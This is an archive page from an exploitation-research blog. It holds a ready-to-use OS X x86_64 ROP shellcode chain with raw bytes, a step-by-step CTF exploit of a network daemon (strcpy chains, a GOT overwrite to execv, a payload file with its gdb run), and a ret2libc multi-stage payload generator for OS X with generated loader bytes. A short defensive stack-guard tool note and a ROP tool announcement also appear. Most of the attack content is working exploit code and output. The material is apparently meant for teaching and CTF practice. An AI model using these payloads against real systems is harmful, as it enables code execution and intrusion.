Yet another universal OSX x86_64 dyld ROP shellcode
July 30, 2011 by longld · Leave a Comment
This technique was killed by OSX Lion 10.7 with full ASLR. @pa_kt has posted an Universal ROP shellcode for OS X x64 with detail steps and explanation. If you don’t have a chance to read above post, the basic ideas are:
- Copy stubcode to a writable area (.data section)
- Make that area RWX
- Jump to RWX area and execute stubcode
- Stubcode will transfer normal shellcode to RWX area and execute it
- All the ROP gadgets are from dyld module which is not randomized
In this post, we shows another OSX x86_64 dyld ROP shellcode which is more simple. We employ the same ideas with some minor differences in implementation:
- Instead of using long gadgets with “leave”, we use direct, short gadgets from unintended code
- Calling mprotect() via syscall
- Short stubcode (7 bytes) using memcpy() to transfer payload
Here is the ROP shellcode with explanation:
# store [target], stubcode 0x00007fff5fc0e7ee # pop rsi ; adc al 0x83 0xc353575e545a5b90 # => rsi = stubcode 0x00007fff5fc24cdc # pop rdi 0x00007fff5fc74f80 # => rdi 0x00007fff5fc24d26 # mov [rdi+0x80] rsi; stubcode => [target] # load rdx, 0x7 (prot RWX) 0x00007fff5fc24cdc # pop rdi 0x00007fff5fc75001 # => rdi 0x00007fff5fc1ddc0 # lea rax, [rdi-0x1] 0x00007fff5fc219c3 # pop rbp ; add [rax] al ; add cl cl 0x00007fff5fc75000 # => rbp 0x00007fff5fc0e7ee # pop rsi ; adc al 0x83 0x0000000000000007 # => rsi 0x00007fff5fc14149 # mov edx esi ; add [rax] al ; add [rbp+0x39] cl => rdx = 0x7 # load rsi, 4096 (size) 0x00007fff5fc0e7ee # pop rsi ; adc al 0x83 0x0000000000001000 # => rsi = 4096 # load rax, mprotect_syscall 0x00007fff5fc24cdc # pop rdi 0x000000000200004b # => rdi 0x00007fff5fc1ddc0 # lea rax, [rdi-0x1] => rax = 0x200004a (mprotect syscall) # load rdi, target 0x00007fff5fc24cdc # pop rdi 0x00007fff5fc75000 # => rdi = target # syscall 0x00007fff5fc1c76d # mov r10, rcx; syscall => mprotect(target, 4096, 7) 0x00007fff5fc75000 # jump to target, execute stubcode # stubcode # 5B pop rbx # rbx -> memcpy() # 5A pop rdx # rdx -> size # 54 push rsp # src -> &shellcode # 5E pop rsi # src -> &shellcode # 57 push rdi # jump to target when return from memcpy() # 53 push rbx # memcpy() # C3 ret # execute memcpy(target, &shellcode, size) 0x00007fff5fc234f0 # &memcpy() 0x0000000000000200 # shellcode size = 512 <your shellcode here>
You can verify those gadgets and find more here: http://goo.gl/p35vY
Ready to use shellcode:
"\xee\xe7\xc0\x5f\xff\x7f\x00\x00\x90\x5b\x5a\x54\x5e\x57\x53\xc3" "\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x80\x4f\xc7\x5f\xff\x7f\x00\x00" "\x26\x4d\xc2\x5f\xff\x7f\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00" "\x01\x50\xc7\x5f\xff\x7f\x00\x00\xc0\xdd\xc1\x5f\xff\x7f\x00\x00" "\xc3\x19\xc2\x5f\xff\x7f\x00\x00\x00\x50\xc7\x5f\xff\x7f\x00\x00" "\xee\xe7\xc0\x5f\xff\x7f\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00" "\x49\x41\xc1\x5f\xff\x7f\x00\x00\xee\xe7\xc0\x5f\xff\x7f\x00\x00" "\x00\x10\x00\x00\x00\x00\x00\x00\xdc\x4c\xc2\x5f\xff\x7f\x00\x00" "\x4b\x00\x00\x02\x00\x00\x00\x00\xc0\xdd\xc1\x5f\xff\x7f\x00\x00" "\xdc\x4c\xc2\x5f\xff\x7f\x00\x00\x00\x50\xc7\x5f\xff\x7f\x00\x00" "\x6d\xc7\xc1\x5f\xff\x7f\x00\x00\x00\x50\xc7\x5f\xff\x7f\x00\x00" "\xf0\x34\xc2\x5f\xff\x7f\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00"
Padocon 2011 CTF Karma 400 exploit: the data re-use way
Karma 400 at Padocon 2011 Online CTF is a fun challenge. The binary was provided without source code, you can reach its decompiled source at disekt’s team writeup. In that writeup, the solution was bruteforcing address of IO stdin buffer with return to do_system() trick. Karma 400 is different than other karma attackme:
- It runs as a network daemon (via xinetd): so you cannot abuse its arguments and environments
- Input buffer is 200 bytes: you have room for payload (not only just overwrite saved EIP)
- There is a 10 seconds sleep before main() returns: this makes bruteforcing less effective
In this post I will show how to exploit karma 400 with data re-use method.
$ gdb -q karma400_lolcosmostic gdb$ pattern_create 200 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag gdb$ r input: Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag Program received signal SIGSEGV, Segmentation fault. --------------------------------------------------------------------------[regs] EAX: 0x00000000 EBX: 0x41346141 ECX: 0xBFFFF384 EDX: 0x00B84FF4 o d I t S z a p c ESI: 0x00000000 EDI: 0x61413561 EBP: 0x62413961 ESP: 0xBFFFF3DC EIP: 0x08048793 CS: 0073 DS: 007B ES: 007B FS: 0000 GS: 0033 SS: 007B [0x007B:0xBFFFF3DC]------------------------------------------------------[stack] 0xBFFFF42C : 64 37 41 64 38 41 64 39 - 41 65 30 41 65 31 41 65 d7Ad8Ad9Ae0Ae1Ae 0xBFFFF41C : 41 64 32 41 64 33 41 64 - 34 41 64 35 41 64 36 41 Ad2Ad3Ad4Ad5Ad6A 0xBFFFF40C : 36 41 63 37 41 63 38 41 - 63 39 41 64 30 41 64 31 6Ac7Ac8Ac9Ad0Ad1 0xBFFFF3FC : 63 31 41 63 32 41 63 33 - 41 63 34 41 63 35 41 63 c1Ac2Ac3Ac4Ac5Ac 0xBFFFF3EC : 41 62 36 41 62 37 41 62 - 38 41 62 39 41 63 30 41 Ab6Ab7Ab8Ab9Ac0A 0xBFFFF3DC : 30 41 62 31 41 62 32 41 - 62 33 41 62 34 41 62 35 0Ab1Ab2Ab3Ab4Ab5 --------------------------------------------------------------------------[code] => 0x8048793: ret 0x8048794: nop 0x8048795: nop 0x8048796: nop -------------------------------------------------------------------------------- 0x08048793 in ?? () gdb$ x/x $esp 0xbffff3dc: 0x31624130 gdb$ pattern_offset 200 0x31624130 Searching for 0Ab1 in buf size 200 32
We have 200-32 = 168 bytes left for our payload. The goal is to execute a custom shell in /tmp, for this purpose I choose execv("/tmp/v", ptr_to_NULL).
Step 1: transfer the string "/tmp/v" to un-used data region using chained strcpy() calls
gdb$ x/32wx 0x08049a50 0x8049a50: 0x00000000 0x00000000 0x00000000 0x00000000 0x8049a60 <stdin>: 0x00b85440 0x00000000 0x00000000 0x00000000 0x8049a70: 0x00000000 0x00000000 0x00000000 0x00000000 0x8049a80 <stdout>: 0x00b854e0 0x00000000 0x00000000 0x00000000 0x8049a90: 0x00000000 0x00000000 0x00000000 0x00000000 0x8049aa0: 0x00000000 0x00000000 0x00000000 0x00000000 0x8049ab0: 0x00000000 0x00000000 0x00000000 0x00000000 0x8049ac0: 0x00000000 0x00000000 0x00000000 0x00000000 TARGET = 0x8049a90 NULLARGV = TARGET - 4 gdb$ info func strcpy@plt All functions matching regular expression "strcpy@plt": Non-debugging symbols: 0x080484f0 strcpy@plt STRCPY = 0x080484f0 gdb$ x/4i 0x80485e3 0x80485e3: pop ebx 0x80485e4: pop ebp 0x80485e5: ret 0x80485e6: lea esi,[esi+0x0] gdb$ POP2RET = 0x80485e3 gdb$ findsubstr 0x08048000 0x08049000 "/tmp/v\\x00" Searching for '/tmp/v\x00' '/': 0x8048134 't': 0x80480f6 'm': 0x80482dc 'p': 0x8048313 '/': 0x8048134 'v\x00': 0x80485e7 DATA1 = [0x8048134, 0x80480f6, 0x80482dc, 0x8048313, 0x8048134, 0x80485e7]
The payload will look like:
[ STRCPY, POP2RET, TARGET, DATA1[0], STRCPY, POP2RET, TARGET+1, DATA1[1], ... ]
Step-2: overwrite GOT entry of puts() (or any function) with execv()
This is a bit tricky, because libc address is ASCII ARMOR we cannot put execv() address directly on the payload. Fortunately, libc address is not randomized so we can directly overwrite GOT with execv() address using strcpy likes the data above.
gdb$ p execv
$2 = {<text variable, no debug info>} 0xac4680 <execv>
EXECV = 0xac4680
gdb$ info functions puts@plt
All functions matching regular expression "puts@plt":
Non-debugging symbols:
0x08048540 puts@plt
gdb$ x/i 0x08048540
0x8048540 <puts@plt>: jmp DWORD PTR ds:0x8049a48
PLTADDR = 0x08048540
GOTADDR = 0x8049a48
gdb$ findsubstr 0x08048000 0x08049000 0xac4680
Searching for '\x80F\xac'
'\x80': 0x804803d
'F': 0x8048003
'\xac': 0x80481b0
gdb$ findsubstr 0x08048000 0x08049000 0x00
Searching for '\x00'
'\x00': 0x8048007
DATA2 = [0x804803d, 0x8048003, 0x80481b0, 0x8048007]
The payload will look like:
[ STRCPY, POP2RET, GOTADDR, DATA2[0], STRCPY, POP2RET, GOTADDR+1, DATA2[1], ... ]
Finally, we make call to execv() via puts@plt:
[ PLTADDR, 0xdeadbeef, TARGET, NULLARGV ]
We have a small problem, our payload size is 176. Each strcpy() call takes 16 bytes payload and there is 10 calls for data transfer, we have to reduce at least 1 call. We can tweak our custom shell a bit to reduce payload length, instead of "/tmp/v" we use "/tmp/ld-linux.so.2" so the last string to copy is "/ld-linux.so.2".
gdb$ findsubstr 0x08048000 0x0804a000 "/" Searching for '/' '/': 0x8048134 gdb$ x/s 0x8048134 0x8048134: "/lib/ld-linux.so.2" gdb$ x/s 0x8048138 0x8048138: "/ld-linux.so.2" DATA1 = [0x8048134, 0x80480f6, 0x80482dc, 0x8048313, 0x8048138]
Wrap things up and test:
gdb$ shell python
Python 2.6.6 (r266:84292, Sep 15 2010, 15:52:39)
[GCC 4.4.5] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> TARGET = 0x8049a90
>>> NULLARGV = TARGET - 4
>>> STRCPY = 0x080484f0
>>> POP2RET = 0x80485e3
>>> DATA1 = [0x8048134, 0x80480f6, 0x80482dc, 0x8048313, 0x8048138]
>>> PAYLOAD = []
>>> for i in range(len(DATA1)):
... PAYLOAD += [STRCPY, POP2RET, TARGET+i, DATA1[i]]
...
>>> for i in range(len(DATA2)):
... PAYLOAD += [STRCPY, POP2RET, GOTADDR+i, DATA2[i]]
...
>>> PAYLOAD += [PLTADDR, 0xdeadbeef, TARGET, NULLARGV]
>>> len(PAYLOAD)
40
>>> fd = open("payload", "wb")
>>> import struct
>>> fd.write("A"*32) # padding
>>> for i in range(len(PAYLOAD)):
... fd.write(struct.pack("<I", PAYLOAD[i]))
...
>>> fd.close()
>>> ^D
gdb$ shell ln -s /usr/bin/id /tmp/ld-linux.so.2
gdb$ r < payload
input: process 1866 is executing new program: /usr/bin/id
Program received signal SIGPIPE, Broken pipe.
Pwned!
Notes:
- This way can also be applied to exploit karma 500
- Disekt's return to do_system() trick is really neat for local exploit
Stack Guard & Format String Blocker in Python
December 23, 2010 by lamer · Leave a Comment
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
Stack Guard & Format String Blocker in Python
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
:author: Nam T. Nguyen
:copyright: 2010, public domain
(Shamefully admitted that this tool was used in the Capture the Flag game at HITB Kuala Lumpur 2010, and it failed)
The Big Picture
===============
Basically, we are running the application under a debugger. When an interesting event occurs, we process it accordingly.
Stack Guard
-----------
The interesting events are function entry and function exit. When we enter into a function, the value at top of stack is XOR'd with a random value. When we exit from a function, the value at TOS is again XOR'd with that same random value.
Format String
-------------
The interesting events are those ``printf`` family functions. When the function is entered, we just have to check if its format string argument contains ``%n`` or ``%hn``. For some functions (e.g. ``printf```), this argument is at TOS + 4 (leave one for saved EBP), for some others (e.g. ``fprintf``) it is at TOS + 8, yet for some (e.g. ``snprintf``) it is at TOS + 12.
The Problems
============
Breakpoints
-----------
The main issue is with multi-process (fork'd code) applications. Basically, when they fork, the soft-breakpoints (0xCC) are retained but the handler does not attach to the new process. Therefore, when a breakpoint hits, the newly forked process simply dies.
To work around this issue, the ``MultiprocessDebugger`` class is written to remember breakpoints in both original and forked processes. It also kills new image (via ``exec``) to protect against successful exploitation that launches ``/bin/sh``, for example.
Function entries/exits
----------------------
Basically, to find all function entries, and exits, we have to walk the code. A recursive iterator (flattened with a simple queue) is used to visit all functions from a starting location (usually ``main`` function). When a ``CALL`` instruction is reached, its destination is deemed a function entry. When a ``RET`` instruction is reached, this current location is deemed an exit of the the current function. This does not work with indirect calls (``CALL EAX``, for e.g.) because we do not know its destination.
Samples
=======
Please peruse ``target.py`` for a sample usage.
Simple Mac OS X ret2libc exploit (x86)
October 5, 2010 by longld · 2 Comments
Talking about buffer overflow exploit on x86, Mac OS X is the most easy and hacker friendly target compare to Linux or Windows. OS X always loads /usr/lib/dyld at a fixed location and it contains a lot of helper stubs to launch the exploit. If you want something advanced likes ROP (Return-Oriented-Programming) exploit you may have a look at “Mac OS X Return-Oriented Exploitation” and thorough step-by-step guide “OSX ROP Exploit – EvoCam Case Study“. But actually, we don’t need ROP for 32-bit exploitation on OS X, simple ret2libc is enough and straightforward to implement. Let take a look at multi-stage ret2libc exploit on OS X.
The target
Under OSX, dyld is always loaded at a fixed location with __IMPORT page is RWX as shown below:
__TEXT 8fe00000-8fe0b000 [ 44K] r-x/rwx SM=COW /usr/lib/dyld __TEXT 8fe0b000-8fe0c000 [ 4K] r-x/rwx SM=PRV /usr/lib/dyld __TEXT 8fe0c000-8fe42000 [ 216K] r-x/rwx SM=COW /usr/lib/dyld __LINKEDIT 8fe70000-8fe84000 [ 80K] r--/rwx SM=COW /usr/lib/dyld __DATA 8fe42000-8fe44000 [ 8K] rw-/rwx SM=PRV /usr/lib/dyld __DATA 8fe44000-8fe6f000 [ 172K] rw-/rwx SM=COW /usr/lib/dyld __IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld
Our target is to transfer the desired shellcode to the __IMPORT section of dyld then execute it. We can simply do this with byte-per-byte copy way of ROPEME. There is some disadvantages with this method:
- Payload size is large, around 10 times of actual shellcode
- We have to re-generate the whole payload when changing to new shellcode
With OS X we can do it better as there is a RWX page at static location.
Staging payload
The most complicated part of ROP technique is “stack pivoting” or ESP register control under ASLR. By executing a small shellcode we can take ESP under control easily. Our multi-stage payload will look like:
Stage-2: actual shellcode
This is the last stage in our multi-stage payload. Any NULL-free shellcode can be used, e.g bind shell code from Metasploit.
Stage-1: shellcode loader for stage-2 payload
This stage will transfer stage-2 payload on stack to __IMPORT section (RWX) of dyld then executes it. The transfer function is _strcpy() in dyld. Below small shellcode will be executed on RWX page to perform the job:
# 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # src -> &shellcode # 50 push eax # dst -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode)
Stage-0: ret2libc loader for stage-1 payload
This stage will transfer 7 bytes of stage-1 payload to our RWX location using repeated _strcpy() calls, then executes it. We lookups the dyld for necessary byte values and copy it to the target byte-per-byte.
In summary, there is some advantages with our multi-stage payload:
- Straightforward to implement: only ret2libc calls, no gadget is required
- Payload size overhead is small: around 100 bytes
- Independent, generic loader code: no need to regenerate the whole payload, just append a new shellcode to make new payload
Automated payload generator
Let put all this together and make an automated payload generator in Python.
- Select the target
#__IMPORT 8fe6f000-8fe70000 [ 4K] rwx/rwx SM=COW /usr/lib/dyld TARGET = 0x8fe6f010 # to avoid NULL byte # dyld base address DYLDADDR = 0x8fe00000
- Extract dyld’s i386 code
# $ otool -f /usr/lib/dyld # ... #architecture 1 # cputype 7 # cpusubtype 3 # capabilities 0x0 # offset 352256 # size 368080 # align 2^12 (4096) # ... DYLDFILE = "/usr/lib/dyld" DYLDCODE = open(DYLDFILE, "rb").read() DYLDCODE = DYLDCODE[352256 : 352256+368080]
- _strcpy() call
# $ nm -arch i386 /usr/lib/dyld | grep _strcpy # 8fe2db10 t _strcpy STRCPY = 0x8fe2db10 # $ otool -arch i386 -tv /usr/lib/dyld | grep pop -A2 | grep ret -B1 | grep pop # 8fe28790 popl %edi # 8fe2b3d4 popl %edi POP2RET = 0x8fe2878f
- stage-1
# stage1 # 58 pop eax # eax -> TARGET # 5B pop ebx # ebx -> STRCPY # 54 push esp # dst -> &shellcode # 50 push eax # src -> TARGET # 50 push eax # jump to TARGET when return from _strcpy() # 53 push ebx # STRCPY # C3 ret # execute _strcpy(TARGET, &shellcode) STAGE1 = "\x58\x5b\x54\x50\x50\x53\xc3"
- stage-0
# stage0: _strcpy sequences STAGE0 = gen_stage0(DYLDCODE, STAGE1)
Below is the stage-0 payload loader generated for OS X 10.6.4:
STAGE0 = ( "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f"
"\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f"
"\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" )
Test the payload with simple buffer overflow:
bash-3.2$ ./vuln "`python -c 'print "A"*272 + "\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x10\xf0\xe6\x8f\x31\x24\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x12\xf0\xe6\x8f\x32\x01\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x13\xf0\xe6\x8f\x7e\x21\xe1\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x15\xf0\xe6\x8f\x45\x10\xe0\x8f\x10\xdb\xe2\x8f\x8f\x87\xe2\x8f\x16\xf0\xe6\x8f\x44\x10\xe0\x8f\x10\xf0\xe6\x8f\x10\xf0\xe6\x8f\x10\xdb\xe2\x8f" + "\xcc"*4'` ... Trace/BPT trap bash-3.2$
Looking for the next? Maybe “Mac OS X ROP exploit on x86_64″ someday.
ROPEME – ROP Exploit Made Easy
ROPEME – ROP Exploit Made Easy – is a PoC tool for ROP exploit automation on Linux x86. It contains a set of simple Python scripts to generate and search for ROP gadgets from binaries and libraries (e.g libc). A sample payload class is also included to help generate multistage ROP payload with the technique described in the Black Hat USA 2010 talk: “Payload already inside: data re-use for ROP exploits“.
Check the latest paper and slides and PoC code.
And take a look at the demo video below:
Enjoy ROPing!

